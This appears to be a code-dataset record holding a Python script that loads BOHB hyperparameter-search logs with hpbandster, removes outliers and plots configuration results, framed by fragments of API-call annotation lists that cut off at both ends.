_map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((6185, 6220), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (6197, 6220), True, 'import pandas as pd\n'), ((6230, 6279), 'snl_d3d_cec_verify.result.faces._faces_frame_to_depth', '_faces_frame_to_depth', (['faces_frame_structured', 'ts'], {}), '(faces_frame_structured, ts)\n', (6251, 6279), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((8456, 8497), 'numpy.isclose', 'np.isclose', (["ds['$z$'].values", '(-1.00114767)'], {}), "(ds['$z$'].values, -1.00114767)\n", (8466, 8497), True, 'import numpy as np\n'), ((9649, 9696), 'numpy.isclose', 'np.isclose', (["ds['$\\\\sigma$'].values", '(-0.49942682)'], {}), "(ds['$\\\\sigma$'].values, -0.49942682)\n", (9659, 9696), True, 'import numpy as np\n'), ((10567, 10578), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {}), '()\n', (10576, 10578), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((10862, 10873), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {}), '()\n', (10871, 10873), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((11762, 11773), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {}), '()\n', (11771, 11773), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((12586, 12628), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke', '_map_to_faces_frame_with_tke', (['map_path', '(-1)'], {}), '(map_path, -1)\n', (12614, 12628), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((14902, 14940), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke', '_map_to_faces_frame_with_tke', (['map_path'], {}), '(map_path)\n', (14930, 14940), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((16904, 16937), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame', '_map_to_faces_frame', (['map_path', '(-1)'], {}), '(map_path, -1)\n', (16923, 16937), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((18892, 18921), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame', '_map_to_faces_frame', (['map_path'], {}), '(map_path)\n', (18911, 18921), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((20573, 20595), 'numpy.array', 'np.array', (['[0, 0, 1, 1]'], {}), '([0, 0, 1, 1])\n', (20581, 20595), True, 'import numpy as np\n'), ((20609, 20645), 'snl_d3d_cec_verify.result.faces._get_quadrilateral_centre', '_get_quadrilateral_centre', (['densities'], {}), '(densities)\n', (20634, 20645), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((20893, 20914), 'snl_d3d_cec_verify.result.faces._FMFaces', '_FMFaces', (['path', '(2)', '(18)'], {}), '(path, 2, 18)\n', (20901, 20914), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((21111, 21146), 'snl_d3d_cec_verify.result.faces._trim_to_faces_frame', '_trim_to_faces_frame', (['trim_path', '(-1)'], {}), '(trim_path, -1)\n', (21131, 21146), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((22842, 22873), 'snl_d3d_cec_verify.result.faces._trim_to_faces_frame', '_trim_to_faces_frame', (['trim_path'], {}), '(trim_path)\n', (22862, 22873), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((24738, 24767), 'snl_d3d_cec_verify.result.faces._StructuredFaces', '_StructuredFaces', (['path', '(2)', '(18)'], {}), '(path, 2, 18)\n', (24754, 24767), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((956, 981), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (969, 981), False, 'import pytest\n'), ((1002, 1025), 'snl_d3d_cec_verify.result.faces._check_case_study', '_check_case_study', (['case'], {}), '(case)\n', (1019, 1025), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((5499, 5526), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (5512, 5526), False, 'import pytest\n'), ((5547, 5600), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['"""mock"""', '"""mock"""', '"""mock"""', '"""mock"""'], {}), "('mock', 'mock', 'mock', 'mock')\n", (5568, 5600), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((6919, 6954), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (6931, 6954), True, 'import pandas as pd\n'), ((10355, 10382), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (10368, 10382), False, 'import pytest\n'), ((14490, 14525), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (14502, 14525), True, 'import pandas as pd\n'), ((18554, 18589), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (18566, 18589), True, 'import pandas as pd\n'), ((7231, 7266), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (7243, 7266), True, 'import pandas as pd\n'), ((7308, 7334), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01"""'], {}), "('2001-01-01')\n", (7320, 7334), True, 'import pandas as pd\n'), ((13927, 13962), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (13939, 13962), True, 'import pandas as pd\n'), ((16243, 16278), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 00:00:00"""'], {}), "('2001-01-01 00:00:00')\n", (16255, 16278), True, 'import pandas as pd\n'), ((16320, 16355), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (16332, 16355), True, 'import pandas as pd\n'), ((18077, 18112), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (18089, 18112), True, 'import pandas as pd\n'), ((20061, 20096), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 00:00:00"""'], {}), "('2001-01-01 00:00:00')\n", (20073, 20096), True, 'import pandas as pd\n'), ((20138, 20173), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (20150, 20173), True, 'import pandas as pd\n'), ((22259, 22294), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (22271, 22294), True, 'import pandas as pd\n'), ((23986, 24021), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 00:00:00"""'], {}), "('2001-01-01 00:00:00')\n", (23998, 24021), True, 'import pandas as pd\n'), ((24063, 24098), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (24075, 24098), True, 'import pandas as pd\n'), ((11605, 11615), 'numpy.diff', 'np.diff', (['x'], {}), '(x)\n', (11612, 11615), True, 'import numpy as np\n')]
|
import colorsys
import math
import os
import random
from decimal import Decimal
import hpbandster.core.result as hpres
import matplotlib.pyplot as plt
import numpy as np
# smallest value is best -> reverse_loss = True
# largest value is best -> reverse_loss = False
REVERSE_LOSS = True
EXP_LOSS = 1
OUTLIER_PERC_WORST = 0.5
OUTLIER_PERC_BEST = 0.0
def analyze_bohb(log_dir, title):
# load the example run from the log files
result = hpres.logged_results_to_HBS_result(log_dir)
# get all executed runs
all_runs = result.get_all_runs()
# get the 'dict' that translates config ids to the actual configurations
id2conf = result.get_id2config_mapping()
# Here is how you get he incumbent (best configuration)
inc_id = result.get_incumbent_id()
# let's grab the run on the highest budget
inc_runs = result.get_runs_by_id(inc_id)
inc_run = inc_runs[-1]
# We have access to all information: the config, the loss observed during
# optimization, and all the additional information
inc_valid_score = inc_run.loss
inc_config = id2conf[inc_id]['config']
inc_info = inc_run['info']
print('Best found configuration :' + str(inc_config))
print('Score: ' + str(inc_valid_score))
print('Info: ' + str(inc_info))
# print('It achieved accuracies of %f (validation) and %f (test).' % (-inc_valid_score, inc_test_score))
# # Let's plot the observed losses grouped by budget,
# hpvis.losses_over_time(all_runs)
#
# # the number of concurent runs,
# hpvis.concurrent_runs_over_time(all_runs)
#
# # and the number of finished runs.
# hpvis.finished_runs_over_time(all_runs)
#
# # This one visualizes the spearman rank correlation coefficients of the losses
# # between different budgets.
# hpvis.correlation_across_budgets(result)
#
# # For model based optimizers, one might wonder how much the model actually helped.
# # The next plot compares the performance of configs picked by the model vs. random ones
# hpvis.performance_histogram_model_vs_random(all_runs, id2conf)
result = remove_outliers(result)
# result = filter_values(result)
# print_configs_sorted_by_loss(result)
# print_stats_per_value(result)
# plot_accuracy_over_budget(result)
plot_parallel_scatter(result)
plt.title(title)
plt.show()
file_name = str(title).strip().replace(' ', '_').lower()
plt.savefig(os.path.join("../experiments/automl_plots/", file_name + ".png"))
def print_configs_sorted_by_loss(result):
lst = []
for k1, v1 in result.data.items():
for k2, v2 in v1.results.items():
loss = v2['loss']
config = v1.config
lst.append((loss, config))
lst.sort(key=lambda x: x[0])
for elem in lst:
print(elem)
def print_stats_per_value(result):
# get all possible keys
min_epoch = float('Inf')
config_params = {}
for value in result.data.values():
for config_param, config_param_val in value.config.items():
for epoch, epoch_result in value.results.items():
try:
loss = epoch_result["loss"]
min_epoch = min(min_epoch, epoch)
if config_param in config_params.keys():
config_params[config_param].append((config_param_val, epoch, loss))
else:
config_params[config_param] = [(config_param_val, epoch, loss)]
except:
print('Error in get_avg_per_value, continuing')
for config_param, data in (dict(sorted(config_params.items()))).items():
print(config_param)
# get all unique possible values for each config parameter
values = set(elem[0] for elem in data)
values = sorted(list(values))
if len(values) > 20:
continue
for value in values:
losses = []
for elem in data:
val, epoch, loss = elem
if val == value and epoch == min_epoch:
losses.append(loss)
print('{} {} {} {}'.format(value, np.mean(losses), np.std(losses), len(losses)))
def remove_outliers(result):
lut = []
for key, value1 in result.data.items():
for value2 in value1.results.values():
if value2 == None:
loss = float('nan')
else:
loss = value2['loss']
lut.append([loss, key])
filtered_lut = [x for x in lut if math.isfinite(x[0])]
worst_loss = sorted(filtered_lut, reverse=REVERSE_LOSS)[0][0]
if REVERSE_LOSS:
worst_loss += 0.01 * abs(worst_loss)
else:
worst_loss -= 0.01 * abs(worst_loss)
# remove NaN's
for i in range(len(lut)):
if not math.isfinite(lut[i][0]) or lut[i][0] == 0:
lut[i][0] = worst_loss
for key in result.data[lut[i][1]].results.keys():
# hacky but sometimes some budgets are missing (presumably when terminating ongoing runs)
if result.data[lut[i][1]].results[key] is None:
continue
else:
result.data[lut[i][1]].results[key]['loss'] = worst_loss
# result.data.pop(elem[1], None)
lut.sort(key=lambda x: x[0], reverse=REVERSE_LOSS)
n_remove_worst = math.ceil(len(lut) * OUTLIER_PERC_WORST)
n_remove_best = math.ceil(len(lut) * OUTLIER_PERC_BEST)
# remove percentage of worst values
for i in range(n_remove_worst):
elem = lut.pop(0)
result.data.pop(elem[1], None)
# remove percentage of best values
for i in range(n_remove_best):
elem = lut.pop()
result.data.pop(elem[1], None)
return result
def filter_values(result):
del_list = []
for key, value1 in result.data.items():
id = key
config = value1.config
rep_env_num = config['rep_env_num']
ddqn_dropout = config['ddqn_dropout']
# if not ddqn_dropout == 0:
# del_list.append(id)
# if not rep_env_num == 5:
# del_list.append(id)
for id in del_list:
result.data.pop(id, None)
return result
def plot_accuracy_over_budget(result):
fig, ax = plt.subplots()
# plot hyperband plot
index = None
color = None
for key, value1 in result.data.items():
if key[0] is not index:
index = key[0]
color = get_bright_random_color()
try:
x = []
y = []
for key2, value2 in value1.results.items():
x.append(key2)
y.append(value2["loss"])
plt.semilogx(x, y, color=color)
except:
print('Error in plot_accuracy_over_budget, continuing')
ax.set_title('Score for different configurations')
ax.set_xlabel('epochs')
ax.set_ylabel('score')
def plot_parallel_scatter(result):
plt.subplots(dpi=300, figsize=(8, 4))
ep_m = 1e9
ep_M = -1e9
loss_m = 1e9
loss_M = -1e9
# get all possible keys
config_params = {}
for value in result.data.values():
for config_param, config_param_val in value.config.items():
for epoch, epoch_result in value.results.items():
try:
loss = epoch_result["loss"]
ep_m = min(ep_m, epoch)
ep_M = max(ep_M, epoch)
loss_m = min(loss_m, loss)
loss_M = max(loss_M, loss)
if config_param in config_params.keys():
config_params[config_param].append((config_param_val, epoch, loss))
else:
config_params[config_param] = [(config_param_val, epoch, loss)]
except:
print('Error in plot_parallel_scatter, continuing')
x_dev = 0.2
r_min = 3
r_max = 4
alpha = 0.4
text_x_offset = -0.1
text_y_offset = -0.1
size_text = 6
index = 0
for config_param, data in (dict(sorted(config_params.items()))).items():
# get all unique possible values for each config parameter
values = set(elem[0] for elem in data)
values = sorted(list(values))
n = len(data)
xs = np.zeros(n)
ys = np.zeros(n)
rads = np.zeros(n)
colors = np.zeros([n, 3])
# extract common features
for i in range(len(values)):
for k in range(len(data)):
if data[k][0] == values[i]:
ep = data[k][1]
acc = map_to_zero_one_range(data[k][2], loss_m, loss_M)
# test:
# loss_b = -1233125.5410615604
# loss_a = -5233125.5410615604 #(we minimize the negative reward)
# print(loss_b, "->", map_to_zero_one_range(loss_b, loss_m, loss_M))
# print(loss_a, "->", map_to_zero_one_range(loss_a, loss_m, loss_M))
rads[k] = linear_interpolation(np.log(ep), np.log(ep_m), np.log(ep_M), r_min, r_max) ** 2
colors[k, :] = get_color(acc)
# check for type (categorical,int,float,log)
if type(values[0]) is bool:
y_dev = x_dev / 2
for i in range(len(values)):
plt.text(index + text_x_offset, values[i] + text_y_offset, str(values[i]), rotation=90,
size=size_text)
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = values[i] + np.random.uniform(-y_dev, y_dev)
elif type(values[0]) is str:
y_dev = min(1 / len(values) / 2.5, x_dev / 2)
for i in range(len(values)):
plt.text(index + text_x_offset, i / (max(len(values) - 1, 1)) + text_y_offset, values[i],
rotation=90, size=size_text)
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = i / (max(len(values) - 1, 1)) + np.random.uniform(-y_dev, y_dev)
elif type(values[0]) is int:
y_dev = min(1 / len(values) / 2.5, x_dev / 2)
plotAllStr = len(values) < 20
if not plotAllStr:
min_val = min(values)
max_val = max(values)
plt.text(index + text_x_offset, 0 + text_y_offset, str(f"{Decimal(min_val):.1E}"), rotation=90, size=size_text)
plt.text(index + text_x_offset, 1 + text_y_offset, str(f"{Decimal(max_val):.1E}"), rotation=90, size=size_text)
for i in range(len(values)):
if plotAllStr:
plt.text(index + text_x_offset, i / (max(len(values) - 1, 1)), str(values[i]), rotation=90,
size=size_text)
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = i / (max(len(values) - 1, 1)) + np.random.uniform(-y_dev, y_dev)
else: # float
min_val = min(values)
max_val = max(values)
# log scale if min/max value differs to much
if max_val / min_val > 100:
val050 = np.exp((np.log(min_val) + np.log(max_val)) / 2)
for i in range(len(values)):
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = linear_interpolation(np.log(data[k][0]), np.log(min_val), np.log(max_val), 0, 1)
# linear scale
else:
val050 = linear_interpolation(0.50, 0, 1, min_val, max_val)
for i in range(len(values)):
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = linear_interpolation(data[k][0], min_val, max_val, 0, 1)
plt.text(index + text_x_offset, 0 + text_y_offset, str(f"{Decimal(min_val):.1E}"), rotation=90, size=size_text)
plt.text(index + text_x_offset, 0.5 + text_y_offset, str(f"{Decimal(val050):.1E}"), rotation=90, size=size_text)
plt.text(index + text_x_offset, 1 + text_y_offset, str(f"{Decimal(max_val):.1E}"), rotation=90, size=size_text)
plt.scatter(xs, ys, s=rads, c=colors, alpha=alpha, edgecolors='none')
index += 1
plt.yticks([], [])
plt.xticks(np.arange(index), (tuple(sorted(config_params.keys()))), rotation=90, fontsize=size_text)
plt.subplots_adjust(bottom=0.25)
def linear_interpolation(x, x0, x1, y0, y1):
# linearly interpolate between two x/y values for a given x value
return y0 + (y1 - y0) * (x - x0) / (x1 - x0 + 1e-9)
def map_to_zero_one_range(loss, loss_m, loss_M):
if loss_M < 1 and loss_m > 0 and REVERSE_LOSS == False:
# if we have already a loss in the [0,1] range, there is no need to normalize anything
acc = loss
elif loss_M < 0 and loss_m > -1 and REVERSE_LOSS == True:
# if we have a loss in the [-1,0] range, simply revert its sign
acc = -loss
else:
# normalize loss to the 0 (bad) - 1(good) range
acc = (loss - loss_m) / (loss_M - loss_m + 1e-9)
if REVERSE_LOSS:
acc = 1 - acc
acc = acc ** EXP_LOSS
return acc
def get_color(acc):
# print("acc: ", acc)
if acc <= 0:
# print("color: ", np.array([[1, 0, 0]]))
return np.array([[1, 0, 0]])
elif acc <= 0.5:
# print("color: ", np.array([[1, 0, 0]]) + 2 * acc * np.array([[0, 1, 0]]))
return np.array([[1, 0, 0]]) + 2 * acc * np.array([[0, 1, 0]])
elif acc <= 1:
# print("color: ", np.array([[1, 1, 0]]) + 2 * (acc - 0.5) * np.array([[-1, 0, 0]]))
return np.array([[1, 1, 0]]) + 2 * (acc - 0.5) * np.array([[-1, 0, 0]])
else:
# print("color: ", np.array([[0, 1, 0]]))
return np.array([[0, 1, 0]])
def get_bright_random_color():
h, s, l = random.random(), 1, 0.5
return colorsys.hls_to_rgb(h, l, s)
if __name__ == '__main__':
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-04-09'
# log_dir = '../results/bohb_params_ql_cb_cliff_2021-03-04-16'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-04-17'
# log_dir = '../results/bohb_params_ql_cb_cliff_2021-03-04-20'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-04-22'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-04-22'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-05-13'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-05-13'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-06-00'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-06-00'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-06-10'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-06-10'
# title = "DDQN ICM on CartPole"
# log_dir = '../results/bohb_params_td3_icm_hc_2021-03-08-20'
# title = "TD3 ICM on HC"
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-08-22'
# title = "TD3 ICM on CMC"
# log_dir = '../results/bohb_params_TD3_discrete_gumbel_temp_annealing_2021-03-11-14'
# title = "Discrete TD3 with annealed temp on CartPole"
# log_dir = '../results/bohb_params_TD3_discrete_gumbel_temp_annealing_on_syn_env_2_2021-03-11-23'
# title = "Discrete TD3 with annealed temp on CartPole Syn Env Model 2"
# log_dir = '../results/bohb_params_ppo_hc_2021-03-13-23'
# title = "PPO on HC"
# log_dir = '../results/bohb_params_td3_icm_cmc_max_reward_2021-03-16-00'
# title = "TD3 ICM on CMC max. reward"
# log_dir = '../results/bohb_params_td3_icm_hc_max_reward_2021-03-16-00'
# title = "TD3 ICM on HC max. reward"
# log_dir = '../results/bohb_params_ppo_hc_icm_1e-3_ent_coef_1e-1_action_std_2021-03-19-20'
# title = "PPO ICM on HC max. reward"
# log_dir = '../results/halfcheetah_td3_bohb_params_se_prep_2021-06-11-11'
# title = "TD3 HC max. reward"
# log_dir = '../results/halfcheetah_td3_bohb_params_se_prep_2021-06-13-17'
# title = "TD3 HC max. reward"
#
# log_dir = '../results/SE_evaluate_cmc_se_params_2021-07-27-11'
# title = "SE CMC HPO"
log_dir = "/home/ferreira/Projects/learning_environments/results/SE_evaluate_cmc_se_params_2021-07-30-10"
title = "SE CMC HPO"
analyze_bohb(log_dir, title=title)
|
[
"matplotlib.pyplot.title",
"numpy.mean",
"numpy.arange",
"colorsys.hls_to_rgb",
"os.path.join",
"numpy.std",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.subplots",
"hpbandster.core.result.logged_results_to_HBS_result",
"matplotlib.pyplot.show",
"random.random",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.semilogx",
"numpy.random.uniform",
"numpy.log",
"decimal.Decimal",
"matplotlib.pyplot.scatter",
"numpy.zeros",
"numpy.array",
"math.isfinite"
] |
[((445, 488), 'hpbandster.core.result.logged_results_to_HBS_result', 'hpres.logged_results_to_HBS_result', (['log_dir'], {}), '(log_dir)\n', (479, 488), True, 'import hpbandster.core.result as hpres\n'), ((2340, 2356), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (2349, 2356), True, 'import matplotlib.pyplot as plt\n'), ((2361, 2371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2369, 2371), True, 'import matplotlib.pyplot as plt\n'), ((6298, 6312), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6310, 6312), True, 'import matplotlib.pyplot as plt\n'), ((6984, 7021), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'dpi': '(300)', 'figsize': '(8, 4)'}), '(dpi=300, figsize=(8, 4))\n', (6996, 7021), True, 'import matplotlib.pyplot as plt\n'), ((12817, 12835), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[]', '[]'], {}), '([], [])\n', (12827, 12835), True, 'import matplotlib.pyplot as plt\n'), ((12945, 12977), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'bottom': '(0.25)'}), '(bottom=0.25)\n', (12964, 12977), True, 'import matplotlib.pyplot as plt\n'), ((14447, 14475), 'colorsys.hls_to_rgb', 'colorsys.hls_to_rgb', (['h', 'l', 's'], {}), '(h, l, s)\n', (14466, 14475), False, 'import colorsys\n'), ((2449, 2513), 'os.path.join', 'os.path.join', (['"""../experiments/automl_plots/"""', "(file_name + '.png')"], {}), "('../experiments/automl_plots/', file_name + '.png')\n", (2461, 2513), False, 'import os\n'), ((8334, 8345), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (8342, 8345), True, 'import numpy as np\n'), ((8359, 8370), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (8367, 8370), True, 'import numpy as np\n'), ((8386, 8397), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (8394, 8397), True, 'import numpy as np\n'), ((8415, 8431), 'numpy.zeros', 'np.zeros', (['[n, 3]'], {}), '([n, 3])\n', (8423, 8431), True, 'import numpy as np\n'), ((12723, 12792), 'matplotlib.pyplot.scatter', 'plt.scatter', (['xs', 'ys'], {'s': 'rads', 'c': 'colors', 'alpha': 'alpha', 'edgecolors': '"""none"""'}), "(xs, ys, s=rads, c=colors, alpha=alpha, edgecolors='none')\n", (12734, 12792), True, 'import matplotlib.pyplot as plt\n'), ((12851, 12867), 'numpy.arange', 'np.arange', (['index'], {}), '(index)\n', (12860, 12867), True, 'import numpy as np\n'), ((13878, 13899), 'numpy.array', 'np.array', (['[[1, 0, 0]]'], {}), '([[1, 0, 0]])\n', (13886, 13899), True, 'import numpy as np\n'), ((14412, 14427), 'random.random', 'random.random', ([], {}), '()\n', (14425, 14427), False, 'import random\n'), ((4560, 4579), 'math.isfinite', 'math.isfinite', (['x[0]'], {}), '(x[0])\n', (4573, 4579), False, 'import math\n'), ((6716, 6747), 'matplotlib.pyplot.semilogx', 'plt.semilogx', (['x', 'y'], {'color': 'color'}), '(x, y, color=color)\n', (6728, 6747), True, 'import matplotlib.pyplot as plt\n'), ((4834, 4858), 'math.isfinite', 'math.isfinite', (['lut[i][0]'], {}), '(lut[i][0])\n', (4847, 4858), False, 'import math\n'), ((14020, 14041), 'numpy.array', 'np.array', (['[[1, 0, 0]]'], {}), '([[1, 0, 0]])\n', (14028, 14041), True, 'import numpy as np\n'), ((14343, 14364), 'numpy.array', 'np.array', (['[[0, 1, 0]]'], {}), '([[0, 1, 0]])\n', (14351, 14364), True, 'import numpy as np\n'), ((4180, 4195), 'numpy.mean', 'np.mean', (['losses'], {}), '(losses)\n', (4187, 4195), True, 'import numpy as np\n'), ((4197, 4211), 'numpy.std', 'np.std', (['losses'], {}), '(losses)\n', (4203, 4211), True, 'import numpy as np\n'), ((14054, 14075), 'numpy.array', 'np.array', (['[[0, 1, 0]]'], {}), '([[0, 1, 0]])\n', (14062, 14075), True, 'import numpy as np\n'), ((14203, 14224), 'numpy.array', 'np.array', (['[[1, 1, 0]]'], {}), '([[1, 1, 0]])\n', (14211, 14224), True, 'import numpy as np\n'), ((14245, 14267), 'numpy.array', 'np.array', (['[[-1, 0, 0]]'], {}), '([[-1, 0, 0]])\n', (14253, 14267), True, 'import numpy as np\n'), ((9095, 9105), 'numpy.log', 'np.log', (['ep'], {}), '(ep)\n', (9101, 9105), True, 'import numpy as np\n'), ((9107, 9119), 'numpy.log', 'np.log', (['ep_m'], {}), '(ep_m)\n', (9113, 9119), True, 'import numpy as np\n'), ((9121, 9133), 'numpy.log', 'np.log', (['ep_M'], {}), '(ep_M)\n', (9127, 9133), True, 'import numpy as np\n'), ((9641, 9673), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (9658, 9673), True, 'import numpy as np\n'), ((9718, 9750), 'numpy.random.uniform', 'np.random.uniform', (['(-y_dev)', 'y_dev'], {}), '(-y_dev, y_dev)\n', (9735, 9750), True, 'import numpy as np\n'), ((10179, 10211), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (10196, 10211), True, 'import numpy as np\n'), ((10276, 10308), 'numpy.random.uniform', 'np.random.uniform', (['(-y_dev)', 'y_dev'], {}), '(-y_dev, y_dev)\n', (10293, 10308), True, 'import numpy as np\n'), ((11173, 11205), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (11190, 11205), True, 'import numpy as np\n'), ((11270, 11302), 'numpy.random.uniform', 'np.random.uniform', (['(-y_dev)', 'y_dev'], {}), '(-y_dev, y_dev)\n', (11287, 11302), True, 'import numpy as np\n'), ((11526, 11541), 'numpy.log', 'np.log', (['min_val'], {}), '(min_val)\n', (11532, 11541), True, 'import numpy as np\n'), ((11544, 11559), 'numpy.log', 'np.log', (['max_val'], {}), '(max_val)\n', (11550, 11559), True, 'import numpy as np\n'), ((12411, 12427), 'decimal.Decimal', 'Decimal', (['min_val'], {}), '(min_val)\n', (12418, 12427), False, 'from decimal import Decimal\n'), ((12537, 12552), 'decimal.Decimal', 'Decimal', (['val050'], {}), '(val050)\n', (12544, 12552), False, 'from decimal import Decimal\n'), ((12660, 12676), 'decimal.Decimal', 'Decimal', (['max_val'], {}), '(max_val)\n', (12667, 12676), False, 'from decimal import Decimal\n'), ((10630, 10646), 'decimal.Decimal', 'Decimal', 